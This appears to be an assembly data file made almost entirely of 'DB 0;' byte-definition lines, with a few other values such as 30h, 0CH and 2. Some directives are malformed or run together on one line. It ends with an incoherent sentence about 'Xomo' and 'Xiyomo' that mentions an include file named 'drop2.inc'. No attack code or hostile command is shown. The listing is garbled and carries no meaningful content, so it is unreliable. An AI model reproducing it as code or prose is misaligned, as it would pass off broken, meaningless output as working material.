DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0; DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 30h; 0
DB 0;
DB 0;
DB 0CH;
DB 0;
DB 0;
DB 0;
DB 2;
DB 30h; 0
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0; DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
DB 0;
Where is Xomo knowing and knowing is Xomiyo knows? Where is Xiyomo? Where is the [drop2.inc]
